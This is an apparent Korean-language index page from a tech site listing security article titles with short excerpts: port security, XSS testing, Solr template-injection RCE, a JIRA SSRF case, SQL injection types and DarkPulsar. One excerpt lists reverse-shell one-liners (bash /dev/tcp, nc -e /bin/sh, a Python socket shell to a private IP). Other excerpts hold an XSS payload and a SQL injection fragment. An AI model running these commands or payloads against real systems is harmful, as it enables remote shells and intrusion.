- 방향:
- 모두 웹3.0 백엔드 개발 웹 프론트엔드 데이터 베이스 운영 및 유지보수 개발 도구 PHP 프레임워크 일일 프로그램 위챗 애플릿 일반적인 문제 다른 기술 CMS 튜토리얼 Java 시스템 튜토리얼 컴퓨터 튜토리얼 하드웨어 튜토리얼 모바일 튜토리얼 소프트웨어 튜토리얼 모바일 게임 튜토리얼
- 나누다:
-
- H3C 포트 보안 기술이란?
- 오늘날 인터넷이 점점 발전함에 따라 보안은 주목해야 할 주제입니다. 무단 사용자 호스트가 기업 네트워크에 무작위로 연결하는 등 기업의 스위치 포트를 위협하는 행위가 많이 있습니다. 예를 들어, 직원이 자신의 노트북을 소유하고 있는 경우, 관리자의 동의 없이 특정 호스트의 네트워크 케이블을 뽑고, 가져온 노트북에 연결한 후 기업 네트워크에 연결하게 되면 큰 보안 위험이 발생하게 됩니다. 기밀 정보가 손실될 가능성이 매우 높습니다. 또 다른 예는 동의 없이 허브 및 기타 네트워크 장비를 설치하는 것입니다. 네트워크 단말기 수를 늘리기 위해 일부 직원은 승인 없이 그렇게 할 것입니다. 허브 및 스위치와 같은 장치를 사무실 네트워크 인터페이스에 연결합니다. 이 경우 해당 네트워크 인터페이스에 해당하는 스위치 인터페이스의 트래픽이 증가합니다.
- 안전 1092 2023-05-19 12:46:46
-
- GRE 기반 IPSec 인스턴스 분석
- IPSecoverGRE
- 안전 989 2023-05-19 12:40:06
-
- xss의 소규모 테스트는 어떻게 수행됩니까?
- 보안 제한은 없습니다. 단지 경고(/xss/)를 사용하세요. 제한 사항: CSS만 사용할 수 있고 html 태그는 허용되지 않습니다. 표현식은 XSS를 구성하는 데 사용할 수 있지만 IE에서만 테스트할 수 있습니다. 다음 테스트는 IE6에서 실행해주세요. body{black;xss:alert(/xss/));/*IE6에서 테스트됨*/}제한사항: HTML은 이스케이프되고 이미지 태그를 사용할 수 있습니다. 테스트에 입력된 문자는 의사 프로토콜을 사용하여 우회할 수 있는 src 주소에 삽입됩니다. 직접 경고(/xss/)를 입력하거나 이벤트를 사용하여 다음과 같이 닫는 설명에 주의하세요.
- 안전 991 2023-05-19 11:37:06
-
- Bash 취약점 재발 분석 예시
- BourneAgainShell(줄여서 BASH)은 1980년에 탄생한 GNU/Linux에서 가장 인기 있는 SHELL 구현입니다. 수십 년의 발전 끝에 단순한 터미널 명령줄 해석기에서 GNU 시스템과 깊이 통합된 다기능 인터페이스로 발전했습니다. . 유닉스 쉘의 일종인 Bash. 최초의 공식 버전은 1989년에 출시되었습니다. 원래는 GNU 운영 체제에서 사용하도록 계획되었지만 이를 기본 셸로 사용하는 Linux 및 MacOSXv10.4를 포함한 대부분의 Unix 계열 운영 체제에서 실행될 수 있습니다. 또한 Microsoft Windows의 Cygwin 및 MinGW로 포팅되었거나 MS-
- 안전 1288 2023-05-19 11:13:11
-
- zabbix가 경로 추적 데이터를 모니터링하는 방법
- 1. Zabbixserver 및 프록시는 mtrmtr 스크립트를 설치하고 이를 zabbixserver 및 프록시의 다음 경로에 배치합니다. chownzabbix:zabbixmtrtrace.shzabbix를 실행하여 mtrtrace 템플릿을 만듭니다. 5. 호스트를 템플릿에 연결하고 zabbix에서 데이터를 관찰합니다. ]-[최신 데이터]:
- 안전 927 2023-05-19 11:10:12
-
- Apache Solr 속도 템플릿 주입 RCE 취약점 분석 예
- 0x01 소개 Solr는 웹서비스와 유사한 API 인터페이스를 제공하는 독립된 기업용 검색 애플리케이션 서버입니다. 사용자는 http 요청을 통해 특정 형식의 XML 파일을 검색 엔진 서버에 제출하여 인덱스를 생성할 수 있으며, HttpGet 작업을 통해 검색 요청을 하고 XML 형식으로 반환된 결과를 얻을 수도 있습니다. 0x02 취약점 소개 Solr에 VelocityResponseWriter 구성 요소가 존재하므로 VelocityResponseWriter 구성 요소가 지정된 템플릿의 로드를 허용하여 Velocity 템플릿 주입 원격 명령 실행 취약점이 발생하도록 특정 요청을 구성할 수 있습니다. 공격자는 이를 악용한다
- 안전 996 2023-05-19 10:37:13
-
- 미군의 기밀되지 않은 인터넷 프로토콜 라우터 네트워크에 접근하기 위해 JIRA 취약점을 이용한 사례 분석
- 다음은 저자가 미 국방부(DoD) Hack the Pentagon 취약점 공개 테스트 프로젝트에 참여하고 JIRA 취약점 CVE-2017-9506을 사용하여 SSRF 공격 표면을 구축하고 미군의 Non-Confidential Internet에 접근한 방법을 설명합니다. NIPRnet(Protocol Router Network) 및 기타 취약점 기술과 결합하여 DoD 인트라넷 시스템의 일련의 민감한 정보를 획득했습니다. 테스트 프로세스와 내용의 기밀성으로 인해 이 기사에서는 기술적인 세부 사항과 자세한 시나리오를 너무 많이 공개하지 않고 이 점만 다루게 됩니다. 이는 단지 학습과 공유를 위한 것이므로 독자 여러분의 양해를 바랍니다. JIRA는 호주 회사인 Atlassian이 개발한 뛰어난 문제 추적 및 관리 소프트웨어 도구로, 다양한 유형의 문제를 추적하고 관리할 수 있습니다.
- 안전 1057 2023-05-18 22:29:09
-
- SQL 인젝션의 유형은 무엇입니까?
- 서문 SQL 주입 공격 방법은 데이터베이스에서 반환된 내용을 애플리케이션이 처리하는 방식에 따라 명시적 주입, 오류 주입, 블라인드 주입으로 나눌 수 있습니다. 명시적 주입 공격자는 현재 인터페이스 콘텐츠에서 원하는 콘텐츠를 직접 얻을 수 있습니다. 오류 주입 데이터베이스 쿼리에서 반환된 결과는 페이지에 표시되지 않지만 애플리케이션은 데이터베이스 오류 정보를 페이지에 인쇄하므로 공격자는 데이터베이스 오류 문을 구성하고 오류 정보에서 원하는 내용을 얻을 수 있습니다. 블라인드 인젝션 데이터베이스 쿼리 결과는 직관적인 페이지에서는 얻을 수 없다. 공격자는 데이터베이스 로직을 이용하거나 데이터베이스 라이브러리의 실행을 지연시켜 원하는 내용을 얻을 수 있다. MySQL 수동 주입 결합 주입?id=1'orderby4--
- 안전 2085 2023-05-18 22:05:12
-
- 리바운드 쉘은 무엇입니까?
- 1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- 안전 2085 2023-05-18 22:01:04
-
- NSA의 새로운 APT 프레임워크 DarkPulsar를 사용하는 방법
- 서문 2017년 3월, ShadowBrokers는 DanderSpritz와 FuzzBunch라는 두 가지 프레임워크를 포함하여 전 세계를 놀라게 한 기밀 문서를 공개했습니다. DanderSpritz는 전적으로 플러그인으로 구성되어 있으며 인텔리전스를 수집하고 취약점을 악용하며 장치를 조작하는 데 사용됩니다. Java로 작성되었으며 봇넷 관리 패널과 유사한 그래픽 인터페이스 및 Metasploit 도구와 유사한 제어판을 제공합니다. 또한 FuzzBunch로 제어되지 않는 장치를 위한 백도어와 플러그인도 통합되어 있습니다. DanderSprit 인터페이스 개요 Fuzzbunch는 다양한 유형의 플러그인을 포함하여 다양한 유틸리티가 상호 작용하고 함께 작동할 수 있는 프레임워크를 제공합니다.
- 안전 1296 2023-05-18 20:14:58
-
- Ghostscript SAFER 샌드박스 우회 취약점을 분석하는 방법
- 서문 Ghostscript는 Adobe PostScript 언어용 인터프리터 소프트웨어입니다. PostScript 언어로 그릴 수 있으며 PS와 PDF 간의 변환을 지원합니다. 현재 대부분의 Linux 배포판에 기본적으로 설치되어 있으며 Unix, MacOS, Windows 및 기타 플랫폼으로 이식되었습니다. Ghostscript는 ImagineMagic, PythonPIL 및 다양한 PDF 리더와 같은 프로그램에서도 사용됩니다. 취약점 설명 8월 21일 Google 보안 연구원 Tavis Ormandy는 이미지에 악성 PostScript 스크립트를 구성하여 우회할 수 있는 여러 GhostScript 취약점을 공개했습니다.
- 안전 1437 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- 안전 1437 2023-05-18 17:13:20
-
- 제한 우회 및 Google 내부 관리 시스템 접속 사례 분석
- 어느 날 구글 취약점을 파헤치던 중, 공개 취약점에서 구글 자체 서비스의 IP 주소 일부를 발견했습니다. 처음에는 이 IP 주소가 무엇을 할 수 있는지 전혀 몰랐습니다. 먼저 이 IP 주소를 확인한 후 여기에 Google의 내부 IP 중 일부가 포함되어 있다는 사실을 추가로 발견했습니다. 최근 내 친구 KLSREERAM이 구글 내부 IP 관련 취약점을 신고했고, 또 다른 친구 비슈누가 구글 서브도메인을 이용해 제어판에 접속하는 취약점을 신고한 일이 문득 생각났다. 현재 두 취약점 모두 Google에서 수정되었으며, 이 두 취약점과 관련된 내부 IP 주소는 인터넷에서 접근할 수 없습니다. 하지만 이제 내 앞에 여러 내부 Google IP 주소가 있으므로 가능한지 확인하는 방법을 찾아야 합니다.
- 안전 1096 2023-05-18 15:19:49
-
- Disk Pulse Enterprise Window 애플리케이션의 취약점 분석을 구현하는 방법
- 1. 취약점 소개 DiskPulseEnterprise는 디스크 변경 사항을 모니터링하는 소프트웨어로 관리 포트 9120 또는 웹 관리 창 80을 통해 소프트웨어를 연결하고 관리하여 디스크 변경 사항을 모니터링할 수 있습니다. DiskPulse Enterprise에는 HTTP 작업을 담당하는 일부 기능이 포함된 동적 링크 라이브러리 libspp.dll이 있습니다. 이 동적 링크 라이브러리에서 게시 데이터를 처리할 때 게시 데이터에 대한 엄격한 길이 제어가 없으므로 문제가 발생합니다. 획득한 데이터를 실행하면 유효하지 않은 메모리에 데이터를 복사해 버퍼 오버플로를 일으키고, SEH 이상 행위 처리를 촉발시키며, 최종적으로 EIP를 제어해 임의의 코드를 실행하게 한다. 소프트웨어 다운로드 링크: h
- 안전 1090 2023-05-18 15:04:07
-
- APP 충돌의 주요 원인은 무엇입니까?
- 1. 충돌 문제를 일으킬 가능성이 있는 시나리오는 무엇입니까? 최근에는 어떤 문제가 충돌을 일으킬 가능성이 높은지 생각해 보았습니다. 즉, 비정상적인 사고를 하는 것입니다. 예를 들어 'The Rookie'라는 미국 TV 시리즈를 보았습니다. 불과 이틀 전. '폴리스'에는 주인공 존 놀란이 경찰차로 도망자의 차를 막지 못해 도망자를 탈출시키는 장면이 나온다. 이 장면과 시험의 연관성은 무엇일까? 우선, 일반 사람들은 도로에서 운전할 때 다른 사람과의 충돌을 피할 것입니다. 이것은 기능을 테스트하는 주요 과정과 같으며 무작위 입력을 하지 않지만 경찰관은 다릅니다. 모든 방법은 테스트 과정에서 기능을 어떻게 조작해야 할지 고민하는 비정상적인 생각과 같아서 사용하기 어렵게 만듭니다. 안내 1. 이상동작 각종 이상동작
- 안전 2464 2023-05-18 13:55:06